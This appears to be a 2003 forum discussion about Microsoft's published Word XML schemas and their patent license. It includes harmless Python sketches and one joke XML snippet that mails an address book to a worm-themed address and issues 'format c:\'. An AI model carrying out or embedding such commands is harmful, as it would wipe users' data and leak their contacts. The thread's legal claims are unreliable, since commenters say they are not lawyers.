Microsoft Word Document ML Schemas Published
Lars Munch writes "On Monday the 17th November the XML schemas for the Word Document ML, along with documentation, were uploaded to the Infostructurebase (ISB). With the Word Document ML specification anybody can generate, view and process Microsoft Word documents in any format." (Here are the legal terms under which the schemas can be used.) "The Word Document ML is based on the W3C specification eXtensible Markup Language (XML), thereby providing documents that are easy to integrate into a large variety of systems. The Danish Government Infostructurebase is the first schema repository to make the schemas accessible to the public. The Microsoft Office Document ML schemas and documentation can now be downloaded from the ISB Repository." There are more links on this page.
I was struck by Microsoft's about-face on proprietary data formats when I attended their "Microsoft Office System Launch" (details here) earlier this month.
On the "Development" track, I was hoping to get some information on interfacing Office tools as objects in an existing (very large) VB application. Well, I didn't get that, but I did get to see how Microsoft is using XML to cut off one of Open Source software's big draws: open file formats. As mentioned, one of the big selling points was that you no longer have to install an app like Word on your server. You can instead use any XML-generating program to create fully compliant Word/Excel/Whatever files.
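To make the "any XML-generating program" point concrete, here is a minimal sketch of what that could look like without Word on the server. The namespace URI, the element names (wordDocument, body, p, r, t) and the mso-application processing instruction are my understanding of the Word 2003 format and should be checked against the published schema; build_wordml is a made-up helper name.

```python
import xml.etree.ElementTree as ET

# Namespace assumed for Word 2003 WordprocessingML; verify against the published schema.
W_NS = "http://schemas.microsoft.com/office/word/2003/wordml"


def build_wordml(paragraphs):
    """Return a WordML-style document as a string, one w:p element per paragraph."""
    ET.register_namespace("w", W_NS)
    root = ET.Element(f"{{{W_NS}}}wordDocument")
    body = ET.SubElement(root, f"{{{W_NS}}}body")
    for text in paragraphs:
        p = ET.SubElement(body, f"{{{W_NS}}}p")  # paragraph
        r = ET.SubElement(p, f"{{{W_NS}}}r")     # run of text
        t = ET.SubElement(r, f"{{{W_NS}}}t")     # the text itself
        t.text = text
    xml_body = ET.tostring(root, encoding="unicode")
    # XML declaration plus the processing instruction that associates the file with Word.
    header = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\n'
        '<?mso-application progid="Word.Document"?>\n'
    )
    return header + xml_body


doc = build_wordml(["Hello from a server with no Word installed."])
```

Whether a file like this counts as "fully compliant" depends on the schema and on the license terms, not on the code.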
So if the PHB was almost talked into Open Source by the security issues of installing a virus portal like Word on a trusted system behind the firewall, Microsoft just cut your legs off.
An interesting case of "If you can't beat 'em, join 'em, *then* beat 'em."
By the way, I bailed out of the "Development" track at lunch. The presentation didn't get into code at all... it was just a demo of how new features in Word will now allow anyone to create XML Schemas and "Solutions" (groups of schemae), and thereby call themselves a "programmer". Just what we need, another way to quickly generate bloated, write-only code.
Stressed? Me? Of course not. Stress is what a rubber band feels before it breaks, silly.
Defeated by my own cleverness and the lameness filter. Now I need to type at random in order to dodge the bullet. Neat-o. Nope, not enough yet. This is better than resorting to cut and pasting of the usual "Important stuff" list, don't you. Although it is rather early for this. DAMN IT still too many caps, although I guess that didn't help, now did it. I guess I could look at the code and see what the percentage is before it dies, but that's way harder than just typing until my fingers bleed.
This is a real problem. However I think it may perhaps be circumvented by having a MSOffice<->OpenOffice converter under a BSD-like license. The combination of the BSD'd plugin and e.g. OpenOffice might however infringe patents if they were too closely integrated. Murky legal waters. Ugh :-(
Any sufficiently advanced libertarian utopia is indistinguishable from government.
It's NOT reasonable. They don't allow any modifications or derivatives of the schema without permission.
So, Microsoft will be free to continue changing their format with each new release, breaking all the open source programs for a time, causing time and trouble for users to upgrade.
We don't like Word formats because they change frequently, and they are developed in a direction that suits Microsoft. How does this change anything?
This is America, damnit. Speak Spanish!
Now try the link
The name and trademarks of Microsoft may NOT be used in any manner, including advertising or publicity pertaining to the Specification or its contents without specific, written prior permission. Title to copyright in the Specification will at all times remain with Microsoft.
So you can write an app which transforms a Word doc to something else, but you can't refer to your app as a Microsoft Word file converter. So how long until we'll have a "Converter for the Evil Empire's word processor document type" project on Sourceforge?
I want to delete my account but Slashdot doesn't allow it.
Microsoft is allowing you to license the patent free of charge but not to sublicense it. The GPL requires that you be allowed to sublicense patents applicable to GPLed software. And that's somehow Microsoft's fault?
I'm assuming it's actually fairly innocent but just how wide a scope does it have under the word 'relating' ?
Finally, what are the legal constraints on M$ changing or withdrawing this licence at a later date? Presumably they are no more limiting than those on the GPL, but then I've never worried about Linus or RMS withdrawing rights from Linux, whereas with M$...
Any ITIALs (I Think I'm A Lawyer) out there who can explain?
Aide-toi, le Ciel t'aidera - Jeanne D'Arc.
> Wait a second ... I think the XML-format document types are only available for corporate versions of MS Office. If that is true there still will be a lot of proprietary binary-only .DOCuments around in the future.
You are wrong. Word Standard Edition can save into WordML (whose schema has been published). The Enterprise version allows you to map certain parts of documents into XML with a customer-specified schema.
Not true. Section 7 of the GPL requires that patent rights be publicly available, but it does not require that you personally sublicense those patent rights.
Specifically, GPL section 7 says:
Since the Microsoft patent license does permit royalty-free redistribution, it does not contradict the GPL in this regard (although it may have other incompatibilities; I have not looked at the whole thing thoroughly yet).
I'll take this over having to reverse-engineer the specs and deal with potential IP issues. For once, Microsoft did us a favor, even if it does come with strings attached.
Finding God in a Dog
<cmdlist>
<command>
<mailto>h4x0r@wegotsworms.com </mailto >
<file>C:\\Documents~1\my_address_book.pdb</file>
</command >
<command type="system" action="format c:\"/>
</cmdlist>
oops. parse error. but a clean HD!
> They don't allow any modifications or
> derivatives of the schema without permission
Hm. I guess I'm not sure what would be gained by doing that - i.e., changing the spec and republishing it. Why would that be a good thing to do, even if you could?
> Microsoft will be free to continue
> changing their format with each new
> release, breaking all the open source
> programs for a time
Right... but couldn't the same be said of any API? I mean, if the Apache plugin API changes, I'll need to rewrite my mod_foo module to use the new API.
The Army reading list
I already have the ability to save my word processing documents as XML. I already have the ability to transform them into other things I want. So do you. Check it out.
I'm sure someone, someplace is already working on the appropriate XSLT to transform Microsoft's stuff into this more open format, and I'm sure Microsoft has some ace up their sleeve technically or legally to push it into a 'gray' area...
But I just cannot imagine anyone having the gall to say that my data is only available to me in a format that they control the terms and conditions on. How successful would a paper company be if they put 'terms and conditions' on the use of their wood pulp?
Why bother with proprietary file formats when you have DRM? Make a mendacious nod to 'open file format', and then lock stuff up behind the DMCA. If you want to read a DRM encoded word document, you'll need word. Period.
--Lawrence Lessig for Congress!
Previously we could reverse engineer their format and use it. Their work was covered by copyright, no problem once we create our own implementation.
This schema is patented. Patents are an exclusive right to use an idea. Now if you use their format without upholding their conditions, you're a criminal, even if you figured out the format yourself.
By publishing the format, they can cast doubt on anyone that does reverse engineer it. "I bet you read the spec on line".
Also, being able to view the format isn't much use. It's XML, but that doesn't mean it will be meaningful cleartext. They can simply uuencode a big block of binary data, stick it between two tags, and it's valid XML.
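A quick sketch of that last point. I'm using Base64 here rather than uuencode, since it is the more common way to do this today, but the effect is the same. The element names and the byte blob are made up for illustration and are not taken from the Office schemas.

```python
import base64
import xml.etree.ElementTree as ET

# Stand-in for proprietary binary data (hypothetical bytes, not a real Office payload).
blob = bytes(range(256))

# Element names are invented for this example.
root = ET.Element("document")
data = ET.SubElement(root, "binData")
data.text = base64.b64encode(blob).decode("ascii")

xml_text = ET.tostring(root, encoding="unicode")

# Any XML parser accepts the file without complaint...
parsed = ET.fromstring(xml_text)

# ...but all it gives you back is the same opaque bytes you started with.
recovered = base64.b64decode(parsed.find("binData").text)
```

The parser is perfectly happy, and you still know nothing about what the bytes mean. Well-formed is not the same as documented.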
Learn from the past. Microsoft are not here to do us favours.
Expert in software patents or patent law? Contribute to the ESP wiki!
I think you are making 2 mistakes here:
(1) You say: Open Source != GNU Public License..
There's no such thing as the "GNU Public License"; you probably mean the GNU General Public License.
(2) Microsoft's license says: "You are not licensed to sublicense or transfer your rights". This means if you write a program using Microsoft's license, and license your program under the BSDL, then someone using your program isn't licensed to modify it. I would imagine MS have done this deliberately to sabotage open source / free software implementations of their XML schemas.
Microsoft knows full well that an XML schema cannot be patented. The patent nonsense is a way to scare off open source developers. They may hold patents on some algorithms they've used to implement this in MS Office, but we don't have to use those same algorithms to read those documents with an XML schema capable parser and do whatever we like with them.
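For instance, pulling the plain text out of such a document takes nothing more than a stock XML parser. This is only a sketch: the namespace URI and the p/r/t element names are my assumption about the Word 2003 format, the sample document is hand-written, and extract_paragraphs is a made-up helper. It says nothing about whether the license or any patent applies.

```python
import xml.etree.ElementTree as ET

# Namespace assumed for Word 2003 WordprocessingML; verify against the published schema.
W_NS = "http://schemas.microsoft.com/office/word/2003/wordml"

# Hand-written sample, not output from Word.
SAMPLE = (
    '<w:wordDocument xmlns:w="%s"><w:body>'
    "<w:p><w:r><w:t>First </w:t></w:r><w:r><w:t>paragraph.</w:t></w:r></w:p>"
    "<w:p><w:r><w:t>Second paragraph.</w:t></w:r></w:p>"
    "</w:body></w:wordDocument>" % W_NS
)


def extract_paragraphs(xml_text):
    """Return the text of each w:p element, joining the text of its runs."""
    root = ET.fromstring(xml_text)
    ns = {"w": W_NS}
    paragraphs = []
    for p in root.iterfind(".//w:p", ns):
        paragraphs.append("".join(t.text or "" for t in p.iterfind(".//w:t", ns)))
    return paragraphs


paragraphs = extract_paragraphs(SAMPLE)
```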
Don't forget that in the EU patents cannot be abused in this way, since the nice people from FFII and others got through an amendment that you are free to use patented technologies for interoperability - and I can't really imagine any other use for a file format besides interoperability.
Real life is overrated.
>Hm. I guess I'm not sure what would be gained by doing that - i.e., changing the spec and republishing it. Why would that be a good thing to do, even if you could?
1) All specifications are incomplete. The requirements that it addresses today are not static, and in 10 years there will be new requirements.
2) Microsoft will change their XML schema.
3) Historically, Microsoft has done things that are in the interest of Microsoft. Everyone else must follow along.
4) Therefore, the changes that Microsoft will make to the XML schema have a high likelihood of being advantageous to Microsoft.
When Microsoft keeps all the real control of the format, it turns any open source developer into a sharecropper. We're going to be plowing a field that we don't own, and the price we pay is going to entrench the Microsoft format even further.
This is America, damnit. Speak Spanish!
Apart from the legal loopholes in Microsoft's license that are big enough to drive a truck through, much more worrisome is the fact that Microsoft asserts that they are getting a patent on an XML Schema. What is the novelty in that schema? It's a standard XML representation of well-known word processing data structures and concepts.
This would be a very bad precedent. Microsoft is really trying to push the limits of patentability and testing what they can get away with. Their patent application on .NET APIs is a similar trial balloon.
That is something open source and free software developers should really worry about.
First, remember that file formats in general are patentable. The ASF video format is one example.
Some might say: "But that's a binary format."
Doesn't matter. Microsoft's Office XML format has plenty of binary data. They uuencode it so that it's official XML, but it's still encrypted or command content, not cleartext.
What if Microsoft embedded an ASF video in the word format?
They'd have to uuencode it first, then stick it in. Would this suddenly make the ASF format non-patented? No. And once parts of a format are patented, you can't recreate the whole format without negotiating a patent deal with the holder.
Yes, the law is an ass. No, you can't circumvent it with clever words.
Expert in software patents or patent law? Contribute to the ESP wiki!
(Forwarded from Patents list)
-------- Original Message --------
Subject: [Patents] MS Office 2003 XML patented
Date: Mon, 17 Nov 2003 13:48:11 +0100
From: Carsten Svaneborg
Organization: www.mpipks-dresden.mpg.de
To: patents@aful.org
Hi! Just came across the following:
http://www.microsoft.com/mscorp/ip/format/xmlpatentlicense.asp
Office 2003 XML Reference Schema Patent License
Microsoft may have patents and/or patent applications that are necessary for
you to license in order to make, sell, or distribute software programs that
read or write files that comply with the Microsoft specifications for the
Office Schemas.
So usage of MS Word XML files requires a patent license.
:
You are not licensed to distribute a Licensed Implementation under license
terms and conditions that prohibit the terms and conditions of this
license. You are not licensed to sublicense or transfer your rights.
The licence is royalty free, but GPL section 7 requires the right to sublicense
patent rights to the people who obtain a GPL program from you.
So in other words Microsoft is using patents to prevent GPLed programs from
accessing the XML format that MS Word will be using.
This is very good timing, and goes to show how important it is to ensure
that the software patent directive has articles that protect
interoperability from constituting patent infringement.
--
Mvh. Carsten Svaneborg
http://www.softwarepatenter.dk
There's a couple issues here:
1) The clause forbidding you from modifying and making derivatives of the specification. Well, certainly, the specification is copyrightable and MS is within their rights to make this demand. Any reverse-engineered description of the file format would not be covered by this clause.
2) The part claiming various restrictions on implementing the specifications. This one's just plain strange. MS doesn't say they've patented the format. Nor do they say that they haven't. They simply suggest that they _might_ have. And if you want to be covered if they have, you've got to accept their terms. Which include not mentioning their name, no sublicensing, including the clause, etc.
IF they have a valid patent, they can enforce this. They can enforce it even if you never looked at the specification. Even if the format was reverse-engineered by a couple of guys from Elbonia who'd never heard of Microsoft until you showed them the files. Wouldn't matter -- if you wanted to read&write Word files, it'd be their way, or the highway.
If, on the other hand, they don't have a valid patent, you can read their specification and implement away. As long as you don't incorporate the spec into your work, copyright can't prevent you from writing an implementation. You can claim compatibility with Microsoft Word or Office (under trademark fair use). You don't have to include any verbiage of theirs. You can print out their license with nontoxic inks on soft paper and use it as it is best intended.
So which is it? Well, Microsoft isn't referring to any particular patent number, so I suspect their license is 95% FUD. The other 5% is that they probably have an application in with the USPTO which covers some either obvious, overbroad, or non-novel things in the Word file format, which will probably be approved because the USPTO approves everything. IMO, and I'm not a lawyer, there's certainly no advantage in accepting the license until Microsoft at least provides a patent number demonstrating that you're actually _getting something_ for accepting their restrictions.